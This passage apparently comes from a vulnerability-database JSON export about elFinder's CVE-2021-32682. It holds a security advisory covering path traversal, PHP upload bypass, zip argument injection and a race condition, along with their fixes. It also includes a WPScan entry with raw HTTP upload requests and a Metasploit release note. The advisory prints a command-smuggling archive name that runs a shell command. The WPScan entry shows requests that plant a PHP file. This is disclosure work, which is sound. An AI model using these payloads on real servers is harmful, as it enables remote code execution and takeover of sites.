worked on the development branch, commit [f9c906d](<https://github.com/Studio-42/elFinder/commit/f9c906d808d1721a62fc2a4fdb38d77c1c1ff229>). Findings were also confirmed on release 2.1.57; all affect the default configuration (unless specified otherwise in this article) and do not require prior authentication. As we mentioned, the exploitation of these vulnerabilities can let an attacker execute arbitrary PHP code on the server where elFinder is installed, ultimately leading to its compromise. \n\nThe findings we discuss in this blog post (all assigned to CVE-2021-32682) and successfully exploited to gain code execution are: \n\n * Deleting Arbitrary Files\n * Moving Arbitrary Files\n * Uploading PHP Files\n * Argument Injection\n * Race Condition\n\nAll these bug classes are very common in software that exposes filesystems to users, and are likely to impact a broad range of products, not only elFinder. \n\nelFinder released version 2.1.59 to address all the bugs we responsibly disclosed. There is no doubt these vulnerabilities will also be exploited in the wild, because exploits [targeting old versions have been publicly released](<https://www.exploit-db.com/search?text=connector.minimal.php>) and the connectors filenames are part of [compilations](<https://github.com/koaj/ffw-content-discovery/blob/9bda1a1ebde71e84bcfde15c46524527bb24087f/cve-wordlist.txt>) of paths to look for when trying to compromise websites. Hence, we highly recommend that all users immediately upgrade elFinder to the latest version.\n\n## Technical Details\n\nelFinder comes with a back end (also called _connector_) written in PHP and a front end written in HTML and JavaScript. The _connector_ is the main script that dispatches the actions of the front end code to the right back end code to implement file system features. Connectors can be configured to disallow dangerous actions, restrict uploads to specific MIME types: two different ones are part of the default install. We detected vulnerabilities in the so-called \u201cminimal\u201d connector. It only allows image and plain text uploads and FTP is the only supported remote virtual filesystem: this is presumably the safest one and the most likely to be deployed. \n\nTo give a better understanding of the code snippets we will use to demonstrate our findings, we will first describe how elFinder\u2019s routing works. Like in many modern PHP applications, the connector (e.g. connector.minimal.php) is the only entry point. It declares configuration directives and closures and then instantiates both elFinder (the core) and elFinderConnector (the interface between elFinder and the transport channel, here HTTP). \n\nThe attribute elFinder::$commands contains every valid action and the expected arguments:\n\n**php/elFinder.class.php**\n \n \n protected $commands = array(\n \u00a0\u00a0'abort' => array('id' => true),\n \u00a0\u00a0'archive' => array('targets' => true, 'type' => true, 'mimes' => false, 'name' => false),\n \u00a0\u00a0'callback' => array('node' => true, 'json' => false, 'bind' => false, 'done' => false),\n \u00a0\u00a0'chmod' => array('targets' => true, 'mode' => true),\n \u00a0\u00a0'dim' => array('target' => true, 'substitute' => false),\n \u00a0\u00a0'duplicate' => array('targets' => true, 'suffix' => false),\n // [...]\n\nThe user can call any of these commands by providing the cmd parameter with the required command parameter via PATH_INFO, GET, or POST. In each command handler, parameters are accessed using $args.\n\nTo allow remote filesystems (FTP, Dropbox, etc.) to be used with local ones, elFinder implements a filesystem abstraction layer (elFinderVolumeDriver) on top of which all drivers are built. Files are then referenced by their volume name (e.g. t1_ is the trash, l1_ the default local volume) and the URL-safe Base64 of their name. \n\nLet\u2019s first dig into an arbitrary file deletion bug chain, composed of two distinct issues.\n\n### Deleting Arbitrary Files\n\nThe PHP core does not provide an effective way to run background threads, or perform synchronization and inter-process communication. elFinder tries to balance this by heavily using temporary files and post-request hooks. For instance, users can abort ongoing actions by calling the method of the same name:\n\n**php/elFinder.class.php**\n \n \n protected function abort($args = array())\n {\n if (!elFinder::$connectionFlagsPath || $_SERVER['REQUEST_METHOD'] === 'HEAD') {\n return;\n }\n \n $flagFile = elFinder::$connectionFlagsPath . DIRECTORY_SEPARATOR . 'elfreq%s';\n if (!empty($args['makeFile'])) { \n self::$abortCheckFile = sprintf($flagFile, $args['makeFile']); // <-- [1]\n touch(self::$abortCheckFile);\n $GLOBALS['elFinderTempFiles'][self::$abortCheckFile] = true;\n return;\n }\n \n $file = !empty($args['id']) ? sprintf($flagFile, $args['id']) : self::$abortCheckFile; // <-- [2]\n $file && is_file($file) && unlink($file);\n }\n\nHere, a code vulnerability is present at [1] and [2]: a user-controlled parameter is concatenated into a full path without prior checks. For [1], it can end up creating an empty file with a fully controllable name, and in [2] it can be used to remove an arbitrary file. SonarCloud issues for both bugs are available: [[1]](<https://sonarcloud.io/project/issues?id=SonarSourceResearch_elFinder2&open=AXhbTmQAMtwvSXpgjgi3&resolved=false&sonarsourceSecurity=path-traversal-injection&types=VULNERABILITY>) and [[2]](<https://sonarcloud.io/project/issues?id=SonarSourceResearch_elFinder2&open=AXhbTmQAMtwvSXpgjgi1&resolved=false&sonarsourceSecurity=path-traversal-injection&types=VULNERABILITY>).\n\nThere is a catch: the filename resulting from [1] will be prefixed by elfreq. In a path traversal attack, POSIX systems will fail path resolution if any predecessor in the path does not exist or is not a directory. For instance, resolving /tmp/i_do_not_exist/../ or /tmp/i_am_a_file/../ will respectively fail with ENOENT and ENOTDIR. This prerequisite makes the exploitation of these two vulnerabilities impossible as-is, and will require another bug, such as the ability to create an arbitrary directory.\n\nAn attacker could then look into the command mkdir and discover a primitive that allows this exact behaviour. Here is its top-level handler, before it goes through the filesystem abstraction layer:\n\n**php/elFinder.class.php**\n \n \n function mkdir($args)\n {\n $target = $args['target'];\n $name = $args['name'];\n $dirs = $args['dirs'];\n // [...]\n if (($volume = $this->volume($target)) == false) {\n return array('error' => $this->error(self::ERROR_MKDIR, $name, self::ERROR_TRGDIR_NOT_FOUND, '#' . $target));\n }\n // [...]\n return ($dir = $volume->mkdir($target, $name)) == false\n ? array('error' => $this->error(self::ERROR_MKDIR, $name, $volume->error()))\n : array('added' => array($dir));\n }\n }\n\nA generic implementation is present in elFinderVolumeDriver to handle both the volume and path that should be created. It will call the volume-specific implementation at [1] with the volume absolute path on the filesystem as the first parameter and the target name as the second parameter: \n\n**php/elFinderVolumeDriver.class.php**\n \n \n public function mkdir($dsthash, $name)\n {\n // [...]\n $path = $this->decode($dsthash);\n // [...]\n $dst = $this->joinPathCE($path, $name);\n // v--- [1]\n $mkpath = $this->convEncOut($this->_mkdir($this->convEncIn($path), $this->convEncIn($name)));\n if ($mkpath) {\n $this->clearstatcache();\n $this->updateSubdirsCache($path, true);\n $this->updateSubdirsCache($mkpath, false);\n }\n \n return $mkpath ? $this->stat($mkpath) : false;\n }\n\nIt is defined as follows:\n\n**php/elFinderVolumeLocalFileSystem.class.php**\n \n \n protected function _joinPath($dir, $name)\n {\n return rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $name;\n }\n \n protected function _mkdir($path, $name)\n {\n $path = $this->_joinPath($path, $name);\n \n if (mkdir($path)) {\n chmod($path, $this->options['dirMode']);\n return $path;\n }\n \n return false;\n }\n\nelFinderVolumeLocalFileSystem::_joinPath() is doing a mere concatenation of the two values, leading to a path traversal vulnerability. This gives a primitive to create arbitrary, empty folders on the local filesystem. While not being a vulnerability in itself, it will allow the exploitation of the aforementioned behaviour. \n\nIt is also worth noting the presence of a full path disclosure in the rm command, disclosing the absolute path of a given file on the local filesystem:\n\n**php/elFinderVolumeDriver.class.php**\n \n \n protected function remove($path, $force = false)\n {\n $stat = $this->stat($path);\n \n if (empty($stat)) {\n return $this->setError(elFinder::ERROR_RM, $path, elFinder::ERROR_FILE_NOT_FOUND);\n }\n\nThe impact of this vulnerability is quite dependent on the environment: it could be chained with other elFinder bugs, used to trigger interesting behaviors in other applications (e.g. [remove WordPress\u2019 wp-config.php file to gain code execution](<https://blog.sonarsource.com/wordpress-file-delete-to-code-execution>)) or used to affect existing security measures (e.g. removing .htaccess files).\n\nThis vulnerability has been [fixed](<https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17#diff-6fe96d285bdbb6d8cf10335a4684ceb4f8badaa6bb7190a4f6b0d960d1af8904L347-R369>) by improving the implementation of elFinderVolumeLocalFileSystem::_joinPath() to assert that the final path won\u2019t be outside of the base one. Several calls to basename() across the codebase were also added as a hardening measure.\n\n### Moving Arbitrary Files\n\nThis same elFinderVolumeLocalFileSystem::_joinPath() method is used in other actions, such as rename: it combines a volume base directory and a user-provided destination name. It is thus vulnerable to the bug we just described. \n\nThe following snippet is the actual implementation of elFinderVolumeLocalFileSystem::rename(), after executing all the code responsible for decoding the paths and ensuring that the destination extension is allowed:\n\n**php/elFinderVolumeLocalFileSystem.class.php**\n \n \n protected function _move($source, $targetDir, $name)\n {\n $mtime = filemtime($source);\n $target = $this->_joinPath($targetDir, $name);\n if ($ret = rename($source, $target) ? $target : false) {\n isset($this->options['keepTimestamp']['move']) && $mtime && touch($target, $mtime);\n }\n return $ret;\n }\n\nWhile the destination extension is still strictly limited by MIME checks, this primitive can be enough for an unauthenticated attacker to gain command execution on the server, depending on the environment, by overriding files like authorized_keys, composer.json, etc. This bug [has been fixed](<https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17#diff-6fe96d285bdbb6d8cf10335a4684ceb4f8badaa6bb7190a4f6b0d960d1af8904L347-R369>) with the same patch as the previous bug we discussed.\n\n### Uploading PHP Files\n\nAs for most PHP applications, the biggest threat faced by elFinder is that an attacker could be able to upload PHP scripts to the server, since nothing (except quite a hardened web server configuration) would prevent them from accessing it directly to execute its contents. The maintainers initially tried to defend against that by crafting a block-list that associated dangerous MIME types to the relevant extensions:\n\n**php/elFinderVolumeDriver.class.php**\n \n \n 'staticMineMap' => array(\n 'php:*' => 'text/x-php',\n 'pht:*' => 'text/x-php',\n 'php3:*' => 'text/x-php',\n 'php4:*' => 'text/x-php',\n 'php5:*' => 'text/x-php',\n 'php7:*' => 'text/x-php',\n 'phtml:*' => 'text/x-php',\n // [...]\n\nIn our test environment (Apache HTTP 2.4.46-1ubuntu1 on Ubuntu 20.10), the default configuration declares that .phar files should be treated as application/x-httpd-php ([1]) and be interpreted:\n \n \n $ cat /etc/apache2/mods-available/php7.4.conf\n <FilesMatch \".+\\.ph(ar|p|tml)$\"> \n SetHandler application/x-httpd-php # <-- [1]\n </FilesMatch> \n <FilesMatch \".+\\.phps$\">\n SetHandler application/x-httpd-php-source\n # Deny access to raw php sources by default\n # To re-enable it's recommended to enable access to the files\n # only in specific virtual host or directory\n Require all denied\n </FilesMatch>\n # Deny access to files without filename (e.g. '.php')\n <FilesMatch \"^\\.ph(ar|p|ps|tml)$\">\n Require all denied\n </FilesMatch>\n // [...]\n\nThis configuration was also observed on Debian\u2019s stable release. While another pass of MIME type detection is performed on the contents of the file, this can be easily circumvented as the PHP interpreter allows statements anywhere in the interpreted files (e.g. <?php can be placed after some dummy data).\n\nThe [fix](<https://github.com/Studio-42/elFinder/commit/75ea92decc16a5daf7f618f85dc621d1b534b5e1>) is straightforward: it declares that .phar files are associated with the MIME text/x-php, which are disallowed by default. \n\n### Argument Injection\n\nAmong the default features that make elFinder so powerful, users can select multiple files and archive them using external tools such as zip, rar, and 7z. This functionality is exposed under the action named archive:\n\n**php/elFinder.class.php**\n \n \n public function archive($args)\n {\n $targets = isset($args['targets']) && is_array($args['targets']) ? $args['targets'] : array();\n $name = isset($args['name']) ? $args['name'] : '';\n \n if (($volume = $this->volume($targets[0])) == false) {\n return $this->error(self::ERROR_ARCHIVE, self::ERROR_TRGDIR_NOT_FOUND);\n }\n \n foreach ($targets as $target) {\n $this->itemLock($target);\n }\n \n return ($file = $volume->archive($targets, $args['type'], $name))\n ? array('added' => array($file))\n : array('error' => $this->error(self::ERROR_ARCHIVE, $volume->error()));\n }\n\nNote that users can create archives even if their upload is forbidden, by calling the archive command on existing files. The implementation is specific to the virtual filesystem in use. We will focus solely on the default one, since it is inherited by elFinderVolumeLocalFileSystem which crafts the full command line ([1]) and executes it with the default shell ([2]):\n\n**php/elFinderVolumeLocalFileSystem.class.php**\n \n \n protected function makeArchive($dir, $files, $name, $arc)\n {\n // [...]\n $cwd = getcwd();\n if (chdir($dir)) {\n foreach ($files as $i => $file) {\n $files[$i] = '.' . DIRECTORY_SEPARATOR . basename($file);\n }\n $files = array_map('escapeshellarg', $files);\n \n $cmd = $arc['cmd'] . ' ' . $arc['argc'] . ' ' . escapeshellarg($name) . ' ' . implode(' ', $files); // <-- [1]\n $this->procExec($cmd, $o, $c); // <-- [2]\n // [...]\n\nHere, the value of $name comes from the user-controlled parameter $_GET['name']. While properly escaped with escapeshellarg() to prevent the use of command substitution sequences, the program will try to parse this value as a flag (\\--foo=bar) and then as a positional argument. It is also worth noting that the user's value is suffixed with .zip in the case in which the ZIP archiver is selected.\n\nThe command zip implements an integrity test feature (-T) that can be used along with -TT to specify the test command to run. In the present case, it gives the attacker a way to execute arbitrary commands using this parameter injection.\n\nTo be able to exploit this vulnerability, the attacker needs to create a dummy file (e.g. a.txt), archive it to create a.zip and then invoke the archive action with both the original file and the archive as targets, using a name like -TmTT="$(id>out.txt)foooo".\n\nThe resulting command line will be zip -r9 -q '-TmTT="$(id>out.txt)foooo".zip' './a.zip' './a.txt', thus executing id and logging its standard output into out.txt \u2014 this file will be available with the other documents in elFinder\u2019s interface.\n\nWhen it came time to fix this bug, zip wasn't very friendly. The usual method based on POSIX\u2019s \\-- ([see our previous article about a parameter injection in Composer for an in-depth explanation](<https://blog.sonasource.com/php-supply-chain-attack-on-composer>)) can\u2019t be applied here, since zip will exit with the following error:\n \n \n zip error: Invalid command arguments (can't use -- before archive name)\n\nThe maintainers then [decided to prefix the archive name with ./ to prevent any risk of parameter injection](<https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17#diff-85602823cf2cdaf2502dc4f1b97001ffc0f083652aef175d9f068a5bfe90ca71L6875-R6882>). They also decided to harden the calls to the other archivers (7z, rar, etc.) in the same patch. \n\n### Quarantine and Race Condition\n\nLet\u2019s have a look at our last finding of this case study. While this vulnerability in the quarantine feature cannot be exploited in the default configuration since archives can\u2019t be uploaded; the feature could have been responsible for future security issues because of its design. \n\nThe rationale behind the quarantine is that archives may contain unwanted files (mostly PHP scripts) that should not be extracted in the current folder without first running security checks (e.g. with MIME validation). So instead, elFinder chose to extract archives into a folder named .quarantine, placed under the files/ folder, and elFinderVolumeLocalFileSystem::_extract() generates a random directory name for each archive extraction (at [1]):\n\n**php/elFinderVolumeLocalFileSystem.class.php**\n \n \n protected function _extract($path, $arc)\n {\n if ($this->quarantine) {\n $dir = $this->quarantine . DIRECTORY_SEPARATOR . md5(basename($path) . mt_rand()); // <-- [1]\n $archive = (isset($arc['toSpec']) || $arc['cmd'] === 'phpfunction') ? '' : $dir . DIRECTORY_SEPARATOR . basename($path);\n // [...]\n\nThis can be confirmed dynamically thanks to strace or the inotify suite, for instance here with an archive containing a PHP file:\n \n \n $ inotifywait -m -r .\n ./ CREATE,ISDIR efbf975ccbac8727f434574610a0f1b6\n ./ OPEN,ISDIR efbf975ccbac8727f434574610a0f1b6\n ]...[\n ./efbf975ccbac8727f434574610a0f1b6/ ATTRIB,ISDIR\n ./efbf975ccbac8727f434574610a0f1b6/ CREATE win.php\n ./efbf975ccbac8727f434574610a0f1b6/ OPEN win.php\n ./efbf975ccbac8727f434574610a0f1b6/ MODIFY win.php\n ./efbf975ccbac8727f434574610a0f1b6/ ATTRIB win.php\n ./efbf975ccbac8727f434574610a0f1b6/ CLOSE_WRITE,CLOSE win.php\n ./efbf975ccbac8727f434574610a0f1b6/ ATTRIB win.php\n [...]\n ./efbf975ccbac8727f434574610a0f1b6/ DELETE win.php\n [...]\n ./efbf975ccbac8727f434574610a0f1b6/ DELETE_SELF\n\nThis trace can be understood as:\n\n * A folder named efbf975ccbac8727f434574610a0f1b6 is created,\n * A file named win.php is created within efbf975ccbac8727f434574610a0f1b6,\n * Data is written into win.php,\n * win.php is deleted,\n * efbf975ccbac8727f434574610a0f1b6 is deleted.\n\nIf the server is configured to list directories, this behavior can easily be exploited, since dangerous files (e.g. .php) can be accessed right before the MIME validation step and their removal. The race condition window is however too small to think of an attack involving brute force if the random directory name can\u2019t be found that way. \n\nAn attacker could discover that the duplicate action can be used on the internal folders, like .quarantine, and copy any file regardless of its contents. While being a harmless functional bug on its own, it can be chained with the quarantine feature to duplicate the folder containing our extracted archive just before its deletion. The duplicated folder is then visible in the interface, and allows an attacker to get around the random name to access the malicious script, ultimately granting arbitrary code execution.\n\nAs a [fix](<https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17#diff-6fe96d285bdbb6d8cf10335a4684ceb4f8badaa6bb7190a4f6b0d960d1af8904L78-R232\\)>), the maintainers decided to move the .quarantine folder outside of files/. The elFinderVolumeLocalFileSystem abstraction layer is not aware of anything outside of this folder, preventing any unintended action on .quarantine.\n\n## Timeline\n\n<table class="table table-striped"><thead><tr><th>Date</th><th>Action</th></tr></thead><tbody><tr><td>2021-03-22</td><td>These 5 issues are reported to maintainers</td></tr><tr><td>2021-06-10</td><td>The maintainers acknowledge all our findings</td></tr><tr><td>2021-06-13</td><td>elFinder 2.1.59 is released, fixing the bugs we reported</td></tr><tr><td>2021-06-13</td><td>CVE-2021-32682 and CVE-2021-23394 are assigned</td></tr></tbody></table>\n\n## Summary\n\nIn this case study we looked at critical code vulnerabilities that are commonly found in web file managers. We presented several of our real-world findings in the latest version of elFinder available at the time, including their potential impact and how they were fixed by the vendor. It allowed us to demonstrate that innocuous bugs can often be combined to gain arbitrary code execution. We believe it is important to document and report these vulnerabilities to break future bug chains and reduce the risk of similar issues.\n\nWe also learned that working with paths is not easy and that extra measures should be taken: performing additional checks in the \u201clow-level\u201d functions, using basename() and dirname() with confidence (and knowing their limits!) and always validating user-controlled data. Such bugs are very common in web file managers, and you should always have such bugs in mind when working with them.\n\nWhile we don\u2019t plan to release any exploits for these bugs, we would still like to bring your attention to the fact that arbitrary code execution was easily demonstrated and attackers won\u2019t have much trouble replicating it. We urge you to immediately upgrade to elFinder 2.1.59. We also advise enforcing strong access control on the connector (e.g. basic access authentication). \n\nFinally, we would like to thank the maintainers of elFinder for acknowledging our advisory and fixing these vulnerabilities in a timely and professional manner.\n\n## Related Blog Posts\n\n * <https://blog.sonarsource.com/php-supply-chain-attack-on-composer>\n * <https://blog.sonarsource.com/bitbucket-path-traversal-to-rce>\n * <https://blog.sonarsource.com/wordpress-file-delete-to-code-execution>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-17T00:00:00", "type": "sonarsource", "title": "elFinder - A Case Study of Web File Manager Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23394", "CVE-2021-32682"], "modified": "2021-08-17T00:00:00", "id": "SONARSOURCE:82C920BF6FA095A2CE2867D1EBDCCC6E", "href": "https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2022-04-15T14:18:16", "description": "The plugin is using an outdated version of the elFinder library, which is know to be affected by security issues (CVE-2021-32682), and does not have any authorisation as well as CSRF checks in its connector AJAX action, allowing any authenticated users, such as subscriber to call it. Furthermore, as the options passed to the elFinder library does not restrict any file type, users with a role as low as subscriber can Create/Upload/Delete Arbitrary files and folders.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "wpexploit", "title": " Library File Manager < 5.2.3 - Subscriber+ Arbitrary File Creation/Upload/Deletion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682", "CVE-2022-0403"], "modified": "2022-04-11T07:40:39", "id": "WPEX-ID:997A7FBF-98C6-453E-AD84-75C1E91D5A1E", "href": "", "sourceData": "Create an empty file to /aa.txt:\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 53\r\nConnection: close\r\nCookie: [any authenticated user]\r\n\r\naction=connector&cmd=mkfile&name=aa.txt&target=l1_Lw\r\n\r\nUpload a PHP file to /hello.php:\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: multipart/form-data; boundary=---------------------------14077557643203747161684872583\r\nContent-Length: 597\r\nConnection: close\r\nCookie: [any authenticated user]\r\n\r\n-----------------------------14077557643203747161684872583\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------14077557643203747161684872583\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------14077557643203747161684872583\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nconnector\r\n-----------------------------14077557643203747161684872583\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"hello.php\"\r\nContent-Type: text/plain\r\n\r\n<?php echo 'failed'; ?>\r\n\r\n-----------------------------14077557643203747161684872583--\r\n\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-09-17T21:01:48", "description": "![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/09/image.png)\n\n## Clone your way to code execution\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/09/metasploit-sky-2.png)\n\nWe\u2019ve had a busy week bringing you exploits, features, enhancements, and fixes. Exploit modules for Git and El Finder lead the pack this week with an information disclosure against Jira and a post exploitation module targeting Geutebruck white-labelled cameras to freeze them like every movie ever!\n\n## Git push upstream git-lfs:payload\n\nOur own Jack Hysel and Shelby Pace had some fun creating an exploit module targeting Github, originally discovered by Dawid Golunski. The exploit requires a user to clone an infected Github repository to gain remote code execution, and before you ask, we promise it is safe to clone ours.\n\n## Jira users\n\nBrian Halbach and Mikhail Klyuchnikov sent us a nice module exploiting [CVE-2020-14181](<https://attackerkb.com/topics/oIM3R25bFH/cve-2020-14181?referrer=blog>) to get a list of Jira users, helping those social engineers among us to get more targets or login scanners more data. Unfortunately, it does not track my tickets and keep them up to date.\n\n## New module content (4)\n\n * [Jira Users Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14631>) by Brian Halbach and Mikhail Klyuchnikov, which exploits [CVE-2020-14181](<https://attackerkb.com/topics/oIM3R25bFH/cve-2020-14181?referrer=blog>) \\- This obtains user names on Jira Server by exploiting an information disclosure vulnerability that exists at the `/ViewUserHover.jspa` endpoint.\n * [elFinder Archive Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15658>) by Shelby Pace and Thomas Chauchefoin, which exploits [CVE-2021-32682](<https://attackerkb.com/topics/llBeWZGXq9/cve-2021-32682?referrer=blog>) \\- This adds an exploit for CVE-2021-32682 which is an unauthenticated RCE in the elFinder PHP application. The vulnerability is due to a flaw that allows a malicious argument to be passed to the zip command when an archive action is performed.\n * [Git Remote Code Execution via git-lfs (CVE-2020-27955)](<https://github.com/rapid7/metasploit-framework/pull/15624>) by Dawid Golunski, [jheysel-r7](<https://github.com/jheysel-r7>), and [space-r7](<https://github.com/space-r7>), which exploits [CVE-2020-27955](<https://attackerkb.com/topics/33ELRpbDyL/cve-2020-27955-git-large-file-storage-git-lfs-git-lfs---remote-code-execution-rce?referrer=blog>) \\- This adds an exploit for CVE-2020-27955 which is a vulnerability in the Git version control system. The module can be used to execute code in the context of a user that can be convinced to clone a malicious repository.\n * [Geutebruck Camera Deface](<https://github.com/rapid7/metasploit-framework/pull/15601>) by Ibrahim Ayadhi and S\u00e9bastien Charbonnier - A new post exploitation module has been added which allows one to take a session on a Geutebruck Camera shell and either freeze the current display stream, replace the current display stream with a static image, or restore the display stream such that it will display the current live feed from the camera.\n\n## Enhancements and features\n\n * [#15609](<https://github.com/rapid7/metasploit-framework/pull/15609>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds additional metadata to exploit modules to specify Meterpreter command requirements. This information is used to add a descriptive warning when running modules with a Meterpreter implementation that doesn't support the required command functionality.\n * [#15674](<https://github.com/rapid7/metasploit-framework/pull/15674>) from [digininja](<https://github.com/digininja>) \\- Updates the Apache Tomcat Ghostcat module to correctly handle a larger range of possible success status codes when verifying if the module has succeeded\n\n## Bugs fixed\n\n * [#15667](<https://github.com/rapid7/metasploit-framework/pull/15667>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fix powershell_reverse_tcp file operations and update the file operations test module\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.5...6.1.6](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-08T18%3A07%3A57-05%3A00..2021-09-15T14%3A13%3A18-05%3A00%22>)\n * [Full diff 6.1.5...6.1.6](<https://github.com/rapid7/metasploit-framework/compare/6.1.5...6.1.6>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).\n\n * _Image credit: Toni Barros from S\u00e3o Paulo, Brasil - Hello, Dolly!, CC BY-SA 2.0 <https://creativecommons.org/licenses/by-sa/2.0>, via Wikimedia Commons_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-17T19:59:18", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181", "CVE-2020-27955", "CVE-2021-32682"], "modified": "2021-09-17T19:59:18", "id": "RAPID7BLOG:30F8EDB723C29FCCD04238CA5385CB84", "href": "https://blog.rapid7.com/2021/09/17/metasploit-wrap-up-130/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}